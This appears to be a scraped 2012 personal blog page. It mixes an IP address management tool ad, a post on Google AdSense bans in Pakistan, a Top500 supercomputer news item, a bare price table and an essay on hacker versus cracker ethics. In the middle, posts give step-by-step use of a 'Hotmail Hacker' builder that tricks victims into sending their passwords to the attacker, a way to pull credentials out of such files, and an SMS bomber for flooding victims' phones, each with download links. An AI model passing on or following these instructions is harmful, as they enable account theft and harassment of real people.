Saturday, 17 November 2012
IP Address Management Tool!
Toss Your Spreadsheets Into the Recycling Bin!
Free IP Address Management Tool!
Does managing your IP address space with spreadsheets remind you of a visit to the dentist? Necessary, but usually painful? As if keeping the network running in tip-top condition wasn’t enough, you have to spend precious time wading through home-grown IPAM tools to track down conflicting addresses and to see which ones are free. Well, no more – you can finally ditch your spreadsheet (and even start to enjoy IP address management)!
Our free IPAM tool, IP Address Tracker, frees you from the evils of spreadsheets, delivering powerful and simple-to-use features that give you a unified view of your IP address space and the tools to manage it – all for free!
Send your spreadsheet to the recycle bin – download the free IP Address Tracker today!
Our free IPAM tool, IP Address Tracker, frees you from the evils of spreadsheets, delivering powerful and simple-to-use features that give you a unified view of your IP address space and the tools to manage it – all for free!
Send your spreadsheet to the recycle bin – download the free IP Address Tracker today!
IP Address Tracker Highlights:
- Track an unlimited number of IP addresses for a unified, at-a-glance view of your entire IP address space
- See which IP addresses are in use – and which are not
- Eliminate manual errors, while ensuring that IP addresses are listed in the right place
Additional IP Address Management Features:
- Determine the last time an IP address was used
- Pre-populate key statistics like DNS and response time
Need Even More Powerful DHCP, DNS, and IP Space Management Software?
For automated DHCP, DNS, and IP Space Management, add a free trial of SolarWinds IP Address Manager (IPAM) to your download. SolarWinds IPAM software enables you and your team to ditch your spreadsheets and switch to easy-to-use, centralized IP address management software. Now it’s easier than ever to manage and monitor Microsoft® DHCP and DNS, as well as Cisco® DHCP servers, all from a single, intuitive Web console.- Centrally manage, monitor, alert, and report on entire IP infrastructure
- Maintain Microsoft DHCP/DNS and Cisco DHCP services from a single web interface
Friday, 16 November 2012
Future of Adsense in Pakistan
Future of Adsense in Pakistan By Aamir Attaa · Tuesday, Oct 25, 2011
It’s dark, and you know it well – just in case if you aren’t aware of recent massacre by Google then the information for you is that Google has banned hundreds of Pakistani adsense accounts by giving odd reasons to each of them, majority of which didn’t make sense to a common man.
Like all businesses – at times Google plays unfair, and it’s fair on their part to save themselves and their stakeholders. Let me give you examples,I know of this Pakistani website which is displaying adsense ads and it should get banned by all definitions and terms of services, but it’s not banned. Reason: This website serves more than 100 million impressions a month.
I am sure this website in question would have a dedicated support engineer deputed to take care of the matters concerning to it.
On other hands, I know of this another website which recently got banned by adsense, just because the website was displaying ads below navigation bar. Which is weird because Google itself preaches publishers to place ads below navigation bar for high CTR.
Another ban reason for thousands of publishers, over the years, is fraud click. They ban the publisher for life, meaning that a publisher banned for fraud click can never participate in adsense for whole life.
I am just wondering, isn’t it possible for Google (a company that spends billions of dollars for research and development) to not to allow second click on adsense ads whenever it is done by same IP and/or same cookie?
Or can’t they cap clicks done in certain duration? For instance if I am given an option to not to allow more than one click from one IP in one week (even if it has multiple users on one network) – I would definitely go for it. I am sure many would opt for it – to avoid permanent ban.
I understand that there would be people asking their FnF including aunts and little cousins to click on their ads, sure go ahead and ban them. But what about those publishers who have been religiously following your TOS and one day someone from their competition comes in and starts click bombing their ads, assumingly from same IP?
Will you ban him/her? You sure will. I have seen such cases myself.
This is how exposed Google adsense is to exploiters.
So like any other business, adsense has loopholes, which can’t be filled. Google has purposefully kept these loopholes to keep itself secured.
Talking specifically about the recent mass-ban of Pakistani publishers – it was our fault too. Like we mentioned in our past post, we Pakistanis vigorously copied international blogs to setup websites. Then did hefty amount of SEO to bring in traffic and monetized it through adsense. Which isn’t legit in many ways.
So all those content lifters sank, not alone but drowned many legit publishers along with them.
Why Pakistan was Targeted?
Have you read my this article: Why Does a Pakistani Website Earn 32 Times Lesser than any American Counterpart?
If not – then please go ahead and read it to understand that Pakistani traffic is of not much value to advertisers.
To put it in simple words: Pakistanis can’t buy products online (due to lack of ecommerce infrastructure), the ads we see are for the free services or (product) information only. This equation translates into a situation where reader/website visitor won’t make money for advertiser.
For many this is fine, for others – this is just the loss of advertising budget, i.e. no return on investment at all.
Coupled with this if content is replicated over hundreds of websites, then why a network like adsense won’t target Pakistanis in particular? I hope you have the answer.
What’s next?
I know it’s ugly, but if Google was your primary source of revenue then you are done. You need to get over with it. You can’t convince Google that you are a legit blogger (even if you are) who puts plenty of effort for generating content. Google won’t listen to you – you need to believe this hard fact, they are least concerned.
I have spoken with some senior people at Google and they are not bothered with whatever perceptions we have got for Google.
There are chances that Google won’t even reply you, or if they do – it will be a pre-drafted email with meaningless and negative message.
So it’s better to re-plan your monetization policy, by either switching to other networks (just like Hamad explained here) or by giving up with it.
For many they deserved this – for others it’s bitter reality and hard luck, the unfortunate end that’s attached with online business models.
Can we Expect a Better Internet After This?
Considering that easy money is gone, all those content lifters will be go away with only legit bloggers left for quality content. This is somewhat better than it was before. Not that we are happy with the situation – but everything happens for good, that how I believe in Allah.
A Local CPM network
is what we need. We saw many local ad networks coming in with big claims, but no one could survive. I will discuss the reasons in a separate post – but to understand that survival of local digital industry, we must get a good CPM network up running in next 6-12 months. Or the local content that brag about will go down the drain.
HACK HOTMAIL ACCOUNTS : HOTMAIL HACKER
I had previously discussed about Gmail Hacker to hack Gmail accounts. Likewise, this software can hack Hotmail accounts. Just follow the steps below:
1. Extract the RAR archive in a separate folder.
2. Run Hotmail Hacker Builder.exe file on your computer.
3. Enter your email address, password and subject of email you wanna receive. I suggest you to create a new email ID for this. You can use Gmail or Yahoo but avoid using Hotmail account. This email will contain the password you wanna hack. Also select appropriate smtp server address. The default smtp server address 587 is of gmail. You can google for smtp server addresses or can find it here. Also, write a fake error message to display on the screen or leave it default.
4. Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.
5. Now, send this Hotmail Hacker.exe file to victim of which you wanna hack Hotmail password and convince him that this program can hack anyone's Hotmail password (lil bit of Social Engineering).
6. Ask him to run Hotmail Hacker.exe and enter all information including his Hotmail ID and password and Hotmail ID of victim he wanna hack. As he enters this information and hits "Login and Start", he will receive a error message.
7. You will receive an email in your account containing his password. Hooray!!! you will now be able to hack hotmail password. Enjoy!!!
Download here:
http://www.mediafire.com/download.php?zjogjlw0ndm
HACK THE HACKER : BIN TEXT
Bin Text is basically a text extractor software used to extract text from application or any file. It can extract email ID and password from applications like Hotmail Hacker and Gmail Hacker. Step by Step usage and tutorial is below:
1. Refer my article Hack Gmail Accounts : Gmail Hacker to create Gmail Hacker.exe file.
2. Unzip the downloaded Bin Text software in a separate folder.
3. Open Bin Text and browse for the location where you have kept the Gmail Hacker.exe file that you have created. Now Hit Go.
4. Bin Text will scan the whole file and display all the extracted text from Gmail Hacker.exe file.
5. Now scroll down till you find email address and password as I have shown in the screen shot above.
This means that if your friend or someone else has given you this Gmail hacker software and told you that this software can hack email accounts and if you feel suspicious of him, you can easily hack his email account password. Enjoy hacking the hacker!!!
Download here:
http://www.mediafire.com/download.php?yoeiinztzyy
SMS Bomber software
This program will bomb the victim's mobile phone with tons of SMS. It supports all major networks around the world. But if your network is not in the list, then don't worry, you can also add the carrier network with the help of "custom" option. You can also load list of multiple victims and bomb them simultaneously. The improvement that Beaver has made in this version over his previous SMS Bomber is that you can spoof the email address from which you are bombing the victim's mobile phone. For Example, If there was an error sending the message, it will ask you if you wanna change the E-mail/Password you are using. All credits to Beaver for this nice program.
Download here
http://www.mediafire.com/download.php?zmd4mtbmtol
Super Computer's Top100 List - November 2012
Oak Ridge's Titan Named World's Fastest Supercomputer
- November 12, 2012 12:57pm EST
The Titan, a Cray XK7 system installed at the Oak Ridge National Laboratory (ORNL) in Tennessee, has been named the fastest supercomputer in the world in the 40th edition of the twice-annual Top500 List.
According to a Top500 news release, the Titan achieved 17.59 Petaflop/s (quadrillions of calculations per second) on the Linpack benchmark. The computer runs 560,640 processors, including 261,632 Nvidia K20x accelerator cores.
Titan replaced Oak Ridge's XT5 Jaguar, which ranked as the world's fastest computer in November 2009 and June 2010 before it was bested by the Chinese Tianhe-1A system at the National Supercomputer Center in Tianjin two years ago.
This summer, however, the U.S. reclaimed the top spot among the world's supercomputers when an American computer topped the list. The Sequoia, an IBM BlueGene/Q system located in the Department of Energy's Lawrence Livermore National Laboratory in California, won the race in June, but has since been knocked to No. 2.
"The new Top500 list clearly demonstrates the U.S. commitment to applying high-performance computer to breakthrough science, and that's our focus at Oak Ridge," director Thom Mason said in a statement. "We'll deliver science from Day One with Titan, and I look forward to the advancements the Titan team will make in areas such as materials research, nuclear energy, combustion and climate science," he said.
The hybrid machine combines the traditional central processing units (CPUs) with graphic processing units (GPUs) — one of the first steps toward the goal of exascale computing, ORNL reported. The new format would generate 1,000 quadrillion calculations per second using 20 megawatts or less of electricity.
Filling out the top five spots, in order, are Fujitsu's K computer at the RIKEN Advanced Institute for Computational Science (AICS) in Kobe, Japan; a BlueGene/Q system called Mira at Argonne National Laboratory; and a BlueGene/Q system named JUQEEN at the Forschungszentrum Juelich in Germany, which has been upgraded and is now considered the most powerful system in Europe, according to Top500.
America also contributed a new system to the Top 10, a Dell PowerEdge C8220 system dubbed Stampede, installed at the Texas Advanced Computing Center at the University of Texas in Austin. Using new Intel Xeon Phi processors, it reaches 2.6 Petaflop/s.
The U.S. has plenty of supercomputer competition, mainly in Asia, where China and Japan dominated the list, with 72 systems (up from 68) and 31 systems (down from 35), respectively.
Meanwhile, computers with multi-core processors dominate the November list. More than 84 percent of the systems use processors with six or more cores, and 46 percent with eight or more, Top500 reported. The majority of those processors are provided by Intel (76 percent), while AMD Opteron produced 12 percent — the same as six months ago, and IBM Power rounded out the bunch with 10 percent.
For more from Stephanie, follow her on Twitter @smlotPCMag.
Thursday, 15 November 2012
Computer's Power Supply
POWER SUPPLY | PRICE |
24500 | |
6500 | |
6300 | |
8100 | |
10500 | |
13800 | |
11800 | |
13000 | |
15500 | |
18000 | |
18500 | |
21800 | |
28500 | |
30000 | |
8600 | |
10500 | |
12600 | |
19000 | |
24000 | |
30000 |
Subscribe to:
Posts (Atom)
"Cracker - This is the common term used to describe a malicious hacker. Crackers get into all kinds of mischief, including breaking or "cracking" copy protection on software programs, breaking into systems and causing harm, changing data, or stealing. Hackers regard crackers as a less educated group of individuals that cannot truly create their own work, and simply steal other people's work to cause mischief, or for personal gain."
"Hacker - This is someone that seeks to understand computer, phone or other systems strictly for the satisfaction of having that knowledge. Hackers wonder how things work, and have an incredible curiosity. Hackers will sometimes do questionable legal things, such as breaking into systems, but they generally will not cause harm once they break in. Contrast a hacker to the term cracker."
Looks good. These are definitely two different types of people, so I understand why a hacker would get upset at being called a cracker. This is the part that gets me, though: "Hackers will sometimes do questionable legal things, such as breaking into systems, but they generally will not cause harm once they break in." I have a few problems with this.
1. Generally? "He breaks into cars and joyrides, but he generally returns them."
2. Questionable legal things? No, breaking into systems one does not own is unquestionably illegal in the U.S.
3. Even so, let's assume the hacker does nothing illegal. How is a company supposed to know the difference between the hacker and the cracker?
Follow me for a minute here: I own a company, NetNut, and it has a computer connected to the internet. Stored on this computer is my secret data. Rufus T. Wanklehacker wakes up one morning and decides to try to break into NetNut's computer. He finds a security hole and succeeds. After he is done, he restores the computer the state he found it in and reports the security flaw to NetNut, so they can fix it. Across the street, MaCooter Q. Buttcracker is just getting up. He decides he'd like to get a piece of that secret data of mine. So he breaks into NetNut's computer and gets the data. He then restores the computer to the state he found it in, and just in case there are any audit logs he doesn't know about, reports the security hole(s) he found when breaking in. In this way he can claim he is just a harmless hacker and avoid prosecution, so long as no one finds out he looked at secret data.
See where I'm going with this? This is not an implication that all hackers have malicious intent. I'm all for the idea of peer-review, publication of security flaws, open-source, etc. But when a hacker breaks into a live system and wants a company to "take his/her word" that no harm will come of it... please. No harm will come of it if the person is truly a harmless hacker, but why would a company want to take the risk?
My question is this: What does a hacker want from the law? Why should a company, after receiving an email about a security flaw from a hacker who broke in, trust that the hacker did not do anything to harm the company? Why should a legal deterrant not come into effect until the company starts losing money? An analogy: "Stealing cars should not be illegal. The owner of the car should not be able to prosecute until the car is actually sold on the black market." Long story short, a cracker is a malicious hacker (see definition above). Malice is not the most measureable aspect of a person. So until the CIA with its drug tests figures out how to determine the exact level of malice in a person's brain, hackers are going to have to find a more obvious way to differentiate their actions from that of crackers if they expect the law, the media, and the corporations not to come down on them.
Here are a list of potential responses:
1.
Response - About the stolen car...
Rebuttal - It's an analogy. I know that a computer user can still use the computer if it is broken into, but a car owner can't drive a car if someone else is driving it. The point is that the car owner never gave permission to anyone to use his car. A better analogy is a house. There's a reason we have laws against breaking and entering in addition to locks on doors. What makes a computer so different?
2.
Response - I'm a hacker and I don't break into sites uninvited. I only reverse engineer software, break into my own systems or my friends' systems, work for a security consulting firm, shoot myself in the junk with a dart gun, etc.
Rebuttal - Then I'm not talking about you. I'm talking about the hackers who break into someone else's system without permission.
3.
Response - On Smarch 32nd, 1989, Ronald M. Jobjob was aquitted of charges of breaking into a computer system on the grounds that he only elevated his privilege level, or was abused as a child, or whatever, so breaking into computer systems is legal.
Rebuttal - Sometimes people get away with doing something that is illegal. Sometimes people are found guilty of a crime they did not commit. In this country though, people are rarely charged with crimes that do not exist (I know some people can probably think of a few straw man examples against this, but they are rare). I work for a large corporation, and I have regularly seen it successfully prosecute people who work for the company and are caught trying to crack passwords or other such hacker activities. Breaking into computers is as illegal as breaking into homes (not the penalty, the legality).